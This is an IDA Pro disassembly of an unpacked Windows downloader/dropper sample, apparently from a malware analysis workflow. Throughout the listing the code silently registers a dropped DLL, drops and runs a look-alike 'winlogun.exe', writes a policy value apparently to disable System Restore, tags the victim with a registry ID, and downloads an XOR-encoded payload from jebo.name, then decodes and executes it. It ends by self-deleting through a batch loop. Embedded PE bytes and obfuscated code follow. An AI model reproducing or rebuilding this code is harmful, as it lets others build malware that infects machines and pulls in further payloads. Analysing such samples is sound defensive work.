;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 3FA17E2277CEAB3DD6E5AE9214ABC20F
; File Name : u:\work\3fa17e2277ceab3dd6e5ae9214abc20f_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00006000 ( 24576.)
; Section size in file : 00006000 ( 24576.)
; Offset to raw data for section: 00001000
; Flags 60000020: Text Executable Readable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
public start
start proc near
xor dx, dx
add eax, ebp
and eax, esp
push 7FFh
push offset aCDocume1Cybert ; "C:\\DOCUME~1\\cyberta\\LOCALS~1\\Temp\\winlo"...
call sub_401664 ; GetSystemDirectoryA
push offset aHsjefi8wunkmdf ; "\\hsjefi8wunkmdf.dll"
push offset aCDocume1Cybert ; "C:\\DOCUME~1\\cyberta\\LOCALS~1\\Temp\\winlo"...
call sub_4016A6 ; lstrcatA
push 0
push 20h
push 2
push 0
push 2
push 40000000h
push offset aCDocume1Cybert ; "C:\\DOCUME~1\\cyberta\\LOCALS~1\\Temp\\winlo"...
call sub_40163A ; CreateFileA
mov ds:dword_40A678, eax
push 0
push offset dword_40AFA9
push 3A98h ; CODE XREF: .text:00406ED9�j
push offset dword_403004
push ds:dword_40A678
call sub_4016A0 ; WriteFile
push ds:dword_40A678
call sub_401634 ; CloseHandle
push offset aCDocume1Cybert ; "C:\\DOCUME~1\\cyberta\\LOCALS~1\\Temp\\winlo"...
push offset aRegsvr32_exeSS ; "Regsvr32.exe /s %s"
push offset aCM_unpackerPac ; "\"C:\\m_unpacker\\packed.exe\""
call sub_40162E ; wsprintfA
add esp, 0Ch
push 5
push offset aCM_unpackerPac ; "\"C:\\m_unpacker\\packed.exe\""
call sub_40169A ; WinExec
call sub_40150E
call sub_401565
push offset aCDocume1Cybert ; "C:\\DOCUME~1\\cyberta\\LOCALS~1\\Temp\\winlo"...
push 800h
call sub_401670 ; GetTempPathA
push offset aWinlogun_exe ; "winlogun.exe"
push offset aCDocume1Cybert ; "C:\\DOCUME~1\\cyberta\\LOCALS~1\\Temp\\winlo"...
call sub_4016A6 ; lstrcatA
push 0
push 20h
push 2
push 0
push 2
push 40000000h
push offset aCDocume1Cybert ; "C:\\DOCUME~1\\cyberta\\LOCALS~1\\Temp\\winlo"...
call sub_40163A ; CreateFileA
mov ds:dword_40A678, eax
push 0
push offset dword_40AFA9
push 3A98h
push offset dword_406A9C
push ds:dword_40A678
call sub_4016A0 ; WriteFile
push ds:dword_40A678
call sub_401634 ; CloseHandle
push 0
push offset aCDocume1Cybert ; "C:\\DOCUME~1\\cyberta\\LOCALS~1\\Temp\\winlo"...
call sub_40169A ; WinExec
push offset aHttpJebo_nameC ; "http://jebo.name/cd/un2.php?id=%s&ver=v"...
call sub_4012DD
push 0
push offset aExplorer_exe ; "explorer.exe"
call sub_40169A ; WinExec
call sub_401127
push eax
call sub_40164C ; ExitProcess
start endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401127 proc near ; CODE XREF: start+11C�p
var_4 = byte ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push 104h
push offset aCM_unpackerP2h ; "C:\\m_unpacker\\p2hhr.bat"
push 0
call sub_401658 ; GetModuleFileNameA
push offset aCM_unpackerP2h ; "C:\\m_unpacker\\p2hhr.bat"
push offset aCM_unpackerP_0 ; "C:\\m_unpacker\\packed.exe"
call sub_4016AC ; lstrcpyA
lea eax, aCM_unpackerP2h ; "C:\\m_unpacker\\p2hhr.bat"
xor dx, cx
loc_401156: ; CODE XREF: sub_401127+3A�j
cmp byte ptr [eax], 5Ch
jnz short loc_40115D
mov edx, eax
loc_40115D: ; CODE XREF: sub_401127+32�j
inc eax
cmp byte ptr [eax], 0
jnz short loc_401156
xor ax, dx
inc edx
mov byte ptr [edx], 0
push offset aP2hhr_bat ; "p2hhr.bat"
push offset aCM_unpackerP2h ; "C:\\m_unpacker\\p2hhr.bat"
call sub_4016A6 ; lstrcatA
push 0
push 0
push 2
push 0
push 3
push 0C0000000h
push offset aCM_unpackerP2h ; "C:\\m_unpacker\\p2hhr.bat"
call sub_40163A ; CreateFileA
mov ds:dword_40A678, eax
inc eax
jz short locret_401209
push offset aLsh2Del1IfExis ; ":lsh2\r\ndel %1\r\nif exist %1 goto lsh2\r\nd"...
call sub_4016B2 ; lstrlenA
mov edx, eax
push 0
lea eax, [ebp+var_4]
push eax
push edx
push offset aLsh2Del1IfExis ; ":lsh2\r\ndel %1\r\nif exist %1 goto lsh2\r\nd"...
push ds:dword_40A678
call sub_4016A0 ; WriteFile
push ds:dword_40A678
call sub_401634 ; CloseHandle
xor eax, ebp
jmp short loc_4011D1
; ---------------------------------------------------------------------------
dword_4011CC dd 22732522h db 0
; ---------------------------------------------------------------------------
loc_4011D1: ; CODE XREF: sub_401127+A3�j
push offset aCM_unpackerP_0 ; "C:\\m_unpacker\\packed.exe"
push offset dword_4011CC
push offset aCM_unpackerPac ; "\"C:\\m_unpacker\\packed.exe\""
call sub_40162E ; wsprintfA
add esp, 0Ch
xor eax, eax
push 0
push eax
push offset aCM_unpackerPac ; "\"C:\\m_unpacker\\packed.exe\""
push offset aCM_unpackerP2h ; "C:\\m_unpacker\\p2hhr.bat"
push offset aOpen ; "open"
push eax
call sub_4016E8
push 0
call sub_40164C ; ExitProcess
locret_401209: ; CODE XREF: sub_401127+71�j
leave
retn
sub_401127 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40120B proc near ; CODE XREF: sub_4012DD+9D�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
mov [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push offset byte_40C6BF
push 0
call sub_4016D6 ; FindFirstUrlCacheEntryA
push [ebp+var_4]
push 42h
call sub_401676 ; GlobalAlloc
mov [ebp+var_8], eax
push [ebp+var_8]
call sub_401682 ; GlobalLock
mov [ebp+var_C], eax
lea eax, [ebp+var_4]
push eax
push [ebp+var_C]
push 0
call sub_4016D6 ; FindFirstUrlCacheEntryA
or eax, eax
jz locret_4012DB
mov [ebp+var_10], eax
mov edx, [ebp+var_C]
push dword ptr [edx+4]
call sub_4016D0 ; DeleteUrlCacheEntryA
push [ebp+var_C]
call sub_401688 ; GlobalUnlock
push [ebp+var_8]
call sub_40167C ; GlobalFree
loc_401274: ; CODE XREF: sub_40120B:loc_4012D9�j
mov [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push offset byte_40C6BF
push [ebp+var_10]
call sub_4016DC ; FindNextUrlCacheEntryA
push [ebp+var_4]
push 42h
call sub_401676 ; GlobalAlloc
mov [ebp+var_8], eax
push [ebp+var_8]
call sub_401682 ; GlobalLock
mov [ebp+var_C], eax
lea eax, [ebp+var_4]
push eax
push [ebp+var_C]
push [ebp+var_10]
call sub_4016DC ; FindNextUrlCacheEntryA
or eax, eax
jz short loc_4012D7
mov [ebp+var_10], eax
mov edx, [ebp+var_C]
push dword ptr [edx+4]
call sub_4016D0 ; DeleteUrlCacheEntryA
push [ebp+var_C]
call sub_401688 ; GlobalUnlock
push [ebp+var_8]
call sub_40167C ; GlobalFree
jmp short loc_4012D9
; ---------------------------------------------------------------------------
loc_4012D7: ; CODE XREF: sub_40120B+AA�j
jmp short locret_4012DB
; ---------------------------------------------------------------------------
loc_4012D9: ; CODE XREF: sub_40120B+CA�j
jmp short loc_401274
; ---------------------------------------------------------------------------
locret_4012DB: ; CODE XREF: sub_40120B+45�j
; sub_40120B:loc_4012D7�j
leave
retn
sub_40120B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4012DD proc near ; CODE XREF: start+10B�p
var_106D = byte ptr -106Dh
var_106C = dword ptr -106Ch
var_1068 = dword ptr -1068h
var_1064 = dword ptr -1064h
var_1060 = dword ptr -1060h
var_105C = byte ptr -105Ch
var_85C = byte ptr -85Ch
var_5C = dword ptr -5Ch
var_54 = byte ptr -54h
var_44 = dword ptr -44h
var_18 = dword ptr -18h
var_14 = word ptr -14h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFEF90h
mov [ebp+var_1060], 1
lea eax, [ebp+var_5C]
push eax
call sub_40166A ; GetSystemTimeAsFileTime
push [ebp+var_5C]
push offset aLu_exe ; "%lu.exe"
push offset a1646169094_exe ; "1646169094.exe"
call sub_40162E ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_85C]
push eax
push 7D0h
call sub_401670 ; GetTempPathA
push offset a1646169094_exe ; "1646169094.exe"
lea eax, [ebp+var_85C]
push eax
call sub_4016A6 ; lstrcatA
push 3E8h
call sub_401694 ; Sleep
lea eax, [ebp+var_5C]
push eax
call sub_40166A ; GetSystemTimeAsFileTime
push [ebp+var_5C]
push offset aLu_exe ; "%lu.exe"
push offset a1646169094_exe ; "1646169094.exe"
call sub_40162E ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_105C]
push eax
push 7D0h
call sub_401670 ; GetTempPathA
push offset a1646169094_exe ; "1646169094.exe"
lea eax, [ebp+var_105C]
push eax
call sub_4016A6 ; lstrcatA
call sub_40120B
push offset a1c97ae360a5d87 ; "1C97AE360A5D87A"
push [ebp+arg_0]
push offset aHttpJebo_nam_0 ; "http://jebo.name/cd/un2.php?id=1C97AE36"...
call sub_40162E ; wsprintfA
add esp, 0Ch
push 0
push 0
lea eax, [ebp+var_85C]
push eax
push offset aHttpJebo_nam_0 ; "http://jebo.name/cd/un2.php?id=1C97AE36"...
push 0
call sub_4016E2
or eax, eax
jnz loc_4014F8
push 0
push 20h
push 3
push 0
push 3
push 80000000h
lea eax, [ebp+var_85C]
push eax
call sub_40163A ; CreateFileA
cmp eax, 0FFFFFFFFh
jz loc_4014A7
mov [ebp+var_1064], eax
push 0
push 20h
push 2
push 0
push 3
push 40000000h
lea eax, [ebp+var_105C]
push eax
call sub_40163A ; CreateFileA
cmp eax, 0FFFFFFFFh
jz loc_40149C
mov [ebp+var_1068], eax
push 0
push [ebp+var_1064]
call sub_401652 ; GetFileSize
cmp eax, 0FFFFFFFFh
jz short loc_401491
or eax, eax
jz short loc_401491
mov [ebp+var_106C], eax
push 0
push offset dword_40AFA9
push 1
lea eax, [ebp+var_106D]
push eax
push [ebp+var_1064]
call sub_40168E ; ReadFile
jmp short loc_401488
; ---------------------------------------------------------------------------
loc_401440: ; CODE XREF: sub_4012DD+1B2�j
push 0
push offset dword_40AFA9
push 1
push offset byte_40A66F
push [ebp+var_1064]
call sub_40168E ; ReadFile
mov al, ds:byte_40A66F
xor al, [ebp+var_106D]
mov ds:byte_40A66F, al
push 0
push offset dword_40AFA9
push 1
push offset byte_40A66F
push [ebp+var_1068]
call sub_4016A0 ; WriteFile
dec [ebp+var_106C]
loc_401488: ; CODE XREF: sub_4012DD+161�j
cmp [ebp+var_106C], 0
jnz short loc_401440
loc_401491: ; CODE XREF: sub_4012DD+13A�j
; sub_4012DD+13E�j
push [ebp+var_1068]
call sub_401634 ; CloseHandle
loc_40149C: ; CODE XREF: sub_4012DD+11E�j
push [ebp+var_1064]
call sub_401634 ; CloseHandle
loc_4014A7: ; CODE XREF: sub_4012DD+F4�j
lea eax, [ebp+var_85C]
push eax
call sub_401646 ; DeleteFileA
mov [ebp+var_44], 44h
lea eax, [ebp+var_44]
push eax
call sub_40165E ; GetStartupInfoA
mov [ebp+var_18], 1
mov [ebp+var_14], 0
lea eax, [ebp+var_54]
push eax
lea eax, [ebp+var_44]
push eax
push 0
push 0
push 0
push 1
push 0
push 0
lea eax, [ebp+var_105C]
push eax
push 0
call sub_401640 ; CreateProcessA
mov [ebp+var_1060], eax
loc_4014F8: ; CODE XREF: sub_4012DD+D0�j
lea eax, [ebp+var_105C]
push eax
call sub_401646 ; DeleteFileA
mov eax, [ebp+var_1060]
leave
retn 4
sub_4012DD endp
; =============== S U B R O U T I N E =======================================
sub_40150E proc near ; CODE XREF: start+8D�p
push offset dword_40AFA9
push offset aA ; ""
push 0
push 0F003Fh
push 0
push 0
push 0
push offset aSoftwarePolici ; "SOFTWARE\\Policies\\Microsoft\\Windows NT\\"...
push 80000002h
call sub_4016BE ; RegCreateKeyExA
mov ds:dword_40AFA9, 1
push 4
push offset dword_40AFA9
push 4
push 0
push offset aDisableConfig ; "Disable Config"
push dword ptr ds:aA ; ""
call sub_4016CA ; RegSetValueExA
push dword ptr ds:aA ; ""
call sub_4016B8 ; RegCloseKey
retn
sub_40150E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401565 proc near ; CODE XREF: start+92�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push offset dword_40AFA9
push offset aA ; ""
push 0
push 0F003Fh
push 0
push 0
push 0
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows\\CurrentVersi"...
push 80000001h
call sub_4016BE ; RegCreateKeyExA
mov ds:dword_40AFA9, 0FFh
push offset dword_40AFA9
push offset a1c97ae360a5d87 ; "1C97AE360A5D87A"
push 0
push 0
push offset aWinid ; "WINID"
push dword ptr ds:aA ; ""
call sub_4016C4 ; RegQueryValueExA
or eax, eax
jz short loc_401602
lea eax, [ebp+var_8]
push eax
call sub_40166A ; GetSystemTimeAsFileTime
push [ebp+var_8]
push [ebp+var_4]
push offset aLxLx ; "%lX%lX"
push offset a1c97ae360a5d87 ; "1C97AE360A5D87A"
call sub_40162E ; wsprintfA
add esp, 10h
push offset a1c97ae360a5d87 ; "1C97AE360A5D87A"
call sub_4016B2 ; lstrlenA
push eax
push offset a1c97ae360a5d87 ; "1C97AE360A5D87A"
push 1
push 0
push offset aWinid ; "WINID"
push dword ptr ds:aA ; ""
call sub_4016CA ; RegSetValueExA
loc_401602: ; CODE XREF: sub_401565+56�j
push dword ptr ds:aA ; ""
call sub_4016B8 ; RegCloseKey
push offset a1c97ae360a5d87 ; "1C97AE360A5D87A"
call sub_4016B2 ; lstrlenA
cmp eax, 0Ah
jnb short locret_40162B
push offset aError ; "ERROR"
push offset a1c97ae360a5d87 ; "1C97AE360A5D87A"
call sub_4016AC ; lstrcpyA
locret_40162B: ; CODE XREF: sub_401565+B5�j
leave
retn
sub_401565 endp
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40162E proc near ; CODE XREF: start+79�p sub_401127+B9�p ...
jmp dword_402080
sub_40162E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401634 proc near ; CODE XREF: start+65�p start+F5�p ...
jmp dword_402060
sub_401634 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40163A proc near ; CODE XREF: start+39�p start+C9�p ...
jmp dword_40204C
sub_40163A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401640 proc near ; CODE XREF: sub_4012DD+210�p
jmp dword_402034
sub_401640 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401646 proc near ; CODE XREF: sub_4012DD+1D1�p
; sub_4012DD+222�p
jmp dword_402014
sub_401646 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40164C proc near ; CODE XREF: start+122�p sub_401127+DD�p
jmp dword_402018
sub_40164C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401652 proc near ; CODE XREF: sub_4012DD+132�p
jmp dword_40201C
sub_401652 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401658 proc near ; CODE XREF: sub_401127+12�p
jmp dword_402020
sub_401658 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40165E proc near ; CODE XREF: sub_4012DD+1E1�p
jmp dword_402024
sub_40165E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401664 proc near ; CODE XREF: start+11�p
jmp dword_402028
sub_401664 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40166A proc near ; CODE XREF: sub_4012DD+17�p
; sub_4012DD+61�p ...
jmp dword_40202C
sub_40166A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401670 proc near ; CODE XREF: start+A1�p sub_4012DD+3D�p ...
jmp dword_402030
sub_401670 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401676 proc near ; CODE XREF: sub_40120B+22�p
; sub_40120B+86�p
jmp dword_402064
sub_401676 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40167C proc near ; CODE XREF: sub_40120B+64�p
; sub_40120B+C5�p
jmp dword_402038
sub_40167C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401682 proc near ; CODE XREF: sub_40120B+2D�p
; sub_40120B+91�p
jmp dword_40203C
sub_401682 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401688 proc near ; CODE XREF: sub_40120B+5C�p
; sub_40120B+BD�p
jmp dword_402040
sub_401688 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40168E proc near ; CODE XREF: sub_4012DD+15C�p
; sub_4012DD+177�p
jmp dword_402044
sub_40168E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401694 proc near ; CODE XREF: sub_4012DD+58�p
jmp dword_402048
sub_401694 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40169A proc near ; CODE XREF: start+88�p start+101�p ...
jmp dword_402068
sub_40169A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4016A0 proc near ; CODE XREF: start+5A�p start+EA�p ...
jmp dword_402050
sub_4016A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4016A6 proc near ; CODE XREF: start+20�p start+B0�p ...
jmp dword_402054
sub_4016A6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4016AC proc near ; CODE XREF: sub_401127+21�p
; sub_401565+C1�p
jmp dword_402058
sub_4016AC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4016B2 proc near ; CODE XREF: sub_401127+78�p
; sub_401565+7E�p ...
jmp dword_40205C
sub_4016B2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4016B8 proc near ; CODE XREF: sub_40150E+51�p
; sub_401565+A3�p
jmp dword_402004
sub_4016B8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4016BE proc near ; CODE XREF: sub_40150E+21�p
; sub_401565+27�p
jmp dword_40200C
sub_4016BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4016C4 proc near ; CODE XREF: sub_401565+4F�p
jmp dword_402008
sub_4016C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4016CA proc near ; CODE XREF: sub_40150E+46�p
; sub_401565+98�p
jmp dword_402000
sub_4016CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4016D0 proc near ; CODE XREF: sub_40120B+54�p
; sub_40120B+B5�p
jmp dword_402090
sub_4016D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4016D6 proc near ; CODE XREF: sub_40120B+18�p
; sub_40120B+3E�p
jmp dword_40208C
sub_4016D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4016DC proc near ; CODE XREF: sub_40120B+7C�p
; sub_40120B+A3�p
jmp dword_402088
sub_4016DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4016E2 proc near ; CODE XREF: sub_4012DD+C9�p
jmp dword_402078
sub_4016E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4016E8 proc near ; CODE XREF: sub_401127+D6�p
jmp dword_402070
sub_4016E8 endp
; ---------------------------------------------------------------------------
align 10h
dd 244h dup(0)
dword_402000 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_402004 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKeydword_402008 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_40200C dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExA dd 0
dword_402014 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileAdword_402018 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcessdword_40201C dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_402020 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_402024 dd 7C801EEEh ; resolved to->KERNEL32.GetStartupInfoAdword_402028 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryAdword_40202C dd 7C8017E5h ; resolved to->KERNEL32.GetSystemTimeAsFileTimedword_402030 dd 7C835DCAh ; resolved to->KERNEL32.GetTempPathAdword_402034 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_402038 dd 7C80FC2Fh ; resolved to->KERNEL32.GlobalFreedword_40203C dd 7C80FF19h ; resolved to->KERNEL32.GlobalLockdword_402040 dd 7C80FE82h ; resolved to->KERNEL32.GlobalUnlockdword_402044 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_402048 dd 7C802442h ; resolved to->KERNEL32.Sleepdword_40204C dd 7C801A24h ; resolved to->KERNEL32.CreateFileAdword_402050 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_402054 dd 7C834D41h ; resolved to->KERNEL32.lstrcatAdword_402058 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyAdword_40205C dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenAdword_402060 dd 7C809B47h ; resolved to->KERNEL32.CloseHandledword_402064 dd 7C80FD2Dh ; resolved to->KERNEL32.GlobalAllocdword_402068 dd 7C86136Dh ; resolved to->KERNEL32.WinExec align 10h
dword_402070 dd 7CA40EE0h align 8
dword_402078 dd 42D779A3h align 10h
dword_402080 dd 7E41A8ADh ; resolved to->USER32.wsprintfA align 8
dword_402088 dd 42C2E399h ; resolved to->WININET.FindNextUrlCacheEntryAdword_40208C dd 42C2DE3Dh ; resolved to->WININET.FindFirstUrlCacheEntryAdword_402090 dd 42C45086h ; resolved to->WININET.DeleteUrlCacheEntryA align 8
dd 21A4h, 2 dup(0)
dd 21C8h, 2080h, 2138h, 2 dup(0)
dd 231Ch, 2014h, 2124h, 2 dup(0)
dd 2370h, 2000h, 21ACh, 2 dup(0)
; ---------------------------------------------------------------------------
retf 23h
; ---------------------------------------------------------------------------
align 4
dd 2088h, 219Ch, 2 dup(0)
dd 23ECh, 2078h, 2194h, 2 dup(0)
dd 2408h, 2070h, 5 dup(0)
dd 235Eh, 232Ah, 234Ah, 2338h, 0
dd 2202h, 2210h, 221Eh, 222Ch, 2242h, 2254h, 226Ah, 2284h
dd 21F0h, 22A2h, 22B0h, 22BEh, 22CEh, 22DAh, 21E2h, 22ECh
dd 22F8h, 2304h, 2310h, 21D4h, 2294h, 22E2h, 0
dd 23F8h, 0
dd 23D6h, 0
dd 21BCh, 0
dd 23B0h, 2396h, 237Eh, 0
dd 73770262h, 6E697270h, 416674h, 72657375h, 642E3233h
dd 6C6Ch, 6C43001Ah, 4865736Fh, 6C646E61h, 300065h, 61657243h
dd 69466574h, 41656Ch, 72430040h, 65746165h, 636F7250h
dd 41737365h, 530000h, 656C6544h, 69466574h, 41656Ch, 78450080h
dd 72507469h, 7365636Fh, 0F50073h, 46746547h, 53656C69h
dd 657A69h, 65470107h, 646F4D74h, 46656C75h, 4E656C69h
dd 41656D61h, 1320000h, 53746547h, 74726174h, 6E497075h
dd 416F66h, 6547013Ch, 73795374h, 446D6574h, 63657269h
dd 79726F74h, 1420041h, 53746547h, 65747379h, 6D69546Dh
dd 46734165h, 54656C69h, 656D69h, 6547014Ah, 6D655474h
dd 74615070h, 4168h, 6C470167h, 6C61626Fh, 6F6C6C41h, 16E0063h
dd 626F6C47h, 72466C61h, 6565h, 6C470172h, 6C61626Fh, 6B636F4Ch
dd 1790000h, 626F6C47h, 6E556C61h, 6B636F6Ch, 1F70000h
dd 64616552h, 656C6946h, 2600000h, 65656C53h, 2940070h
dd 456E6957h, 636578h, 7257029Eh, 46657469h, 656C69h, 736C02B5h
dd 61637274h, 4174h, 736C02BBh, 70637274h, 4179h, 736C02BFh
dd 656C7274h, 416Eh, 6E72656Bh, 32336C65h, 6C6C642Eh, 1800000h
dd 43676552h, 65736F6Ch, 79654Bh, 65520184h, 65724367h
dd 4B657461h, 78457965h, 1A30041h, 51676552h, 79726575h
dd 756C6156h, 41784565h, 1AE0000h, 53676552h, 61567465h
dd 4565756Ch, 4178h, 61766461h, 32336970h, 6C6C642Eh, 0A0000h
dd 656C6544h, 72556574h, 6361436Ch, 6E456568h, 41797274h
dd 130000h, 646E6946h, 73726946h, 6C725574h, 68636143h
dd 746E4565h, 417972h, 6946001Ah, 654E646Eh, 72557478h
dd 6361436Ch, 6E456568h, 41797274h, 69770000h, 656E696Eh
dd 6C642E74h, 31006Ch, 444C5255h, 6C6E776Fh, 5464616Fh
dd 6C69466Fh, 4165h, 6D6C7275h, 642E6E6Fh, 6C6Ch, 68530067h
dd 456C6C65h, 75636578h, 416574h, 6C656873h, 2E32336Ch
dd 6C6C64h, 2FBh dup(0)
dd 30303030h
dword_403004 dd 905A4Dh, 3, 4, 0FFFFh, 0B8h, 0 dd 40h, 8 dup(0)
dd 0F0h, 0EBA1F0Eh, 0CD09B400h, 4C01B821h, 685421CDh, 70207369h
dd 72676F72h, 63206D61h, 6F6E6E61h, 65622074h, 6E757220h
dd 206E6920h, 20534F44h, 65646F6Dh, 0A0D0D2Eh, 24h, 1Dh dup(0)
dd 4550h, 3014Ch, 496C9E67h, 2 dup(0)
dd 210E00E0h, 5010Bh, 1E00h, 800h, 0
dd 2 dup(1000h), 3000h, 10000000h, 1000h, 200h, 4, 0
dd 4, 0
dd 7000h, 400h, 10A14h, 2, 100000h, 1000h, 100000h, 1000h
dd 0
dd 10h, 3670h, 0A5h, 3000h, 28h, 6 dup(0)
dd 4000h, 26h, 14h dup(0)
dd 7865742Eh, 74h, 2000h, 1000h, 1E00h, 400h, 3 dup(0)
dd 60000020h, 6164722Eh, 6174h, 1000h, 3000h, 800h, 2200h
dd 3 dup(0)
dd 0C0000040h, 6C65722Eh, 636Fh, 3000h, 4000h, 200h, 2A00h
dd 3 dup(0)
dd 42000040h, 68h dup(0)
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFBCh
pusha
lea ecx, ds:0C506E697h
mov si, 0B6D7h
xchg ecx, esi
xchg edi, ecx
add esi, 59581FE4h
neg edi
push 1000104Ah
mov esi, 0B575150Bh
neg ebx
not edi
xor ebx, eax
not esi
lea ebx, ds:15A51997h
cmp edx, 95F23A39h
retn
; ---------------------------------------------------------------------------
dd 51DD3D8Dh, 0D4333168h, 0A29D181h, 45C72FBFh, 72654BDFh
dd 72F7816Eh, 8BAFB4B4h, 8DF933D6h, 0B5BFE735h, 8BD133DFh
dd 0E345C7F9h, 32336C65h, 0DBF7F633h, 858DCF81h, 0EBC14F88h
dd 81D6F70Fh, 0CDEA8AFBh, 0E745C76Fh, 6C6C642Eh, 0F9ABD181h
dd 0BE66DFEDh, 0C933C999h, 0EF73A1B9h, 0F129BB6Dh, 0D9F76D1Dh
dd 9533BB66h, 0EB45C6h, 5FA2C181h, 0B9667FD2h, 0CFC13F1Dh
dd 141D8D02h, 661D1010h, 8D836CBAh, 2DBD740Dh, 8DDF33E9h
dd 0FBBFC845h, 33CDBAD2h, 0C1D787DCh, 0E9810CC6h, 15AE5B4Ah
dd 0B966DE8Bh, 0BE50036Ch, 0CDF6E0B0h, 0D8DF98Bh, 611F52A7h
dd 0D1A56BAh, 0D3F790C1h, 0B9EF3D8Dh, 83B9750Ah, 8D755C3Fh
dd 1468C615h, 66FD3361h, 902E1CBFh, 2DC5E281h, 0D3F7AD76h
dd 0D7C1D1F7h, 20158D17h, 0BE516275h, 0D90B9185h, 0C1DF458Dh
dd 0D18B0EC9h, 36B9DF33h, 507FA5E8h, 5DF5BF66h, 0E381DB33h
dd 5FD5C88Bh, 0C95CFA81h, 0E9812FF6h, 0B57B4BDCh, 30AC15FFh
dd 0D6C11000h, 0DAB9B912h, 0BF66CD5Ah, 8D90FAB0h, 58B8D20Dh
dd 2ABA66B9h, 33D38B84h, 0C1F28BD0h, 358D12D7h, 14D8BA2h
dd 54A422BFh, 0C2819015h, 0CDB05C1Fh, 0E057B966h, 0C5A2CA81h
dd 0EF81E914h, 0ED69EF32h, 660FDAC1h, 66D7E1BBh, 0C1B0ABBEh
dd 15FF1DC9h, 10003074h, 4C5FBB66h, 192BBA66h, 713EC281h
dd 6650A14Eh, 81C924BBh, 80C410E2h, 8BDFF755h, 95DA81F3h
dd 0C1B11944h, 0F79012E7h, 0BADD33D9h, 710A5A55h, 8DD1F790h
dd 4735641Dh, 1BE6C135h, 7E53B966h, 52C845C7h, 0BE696765h
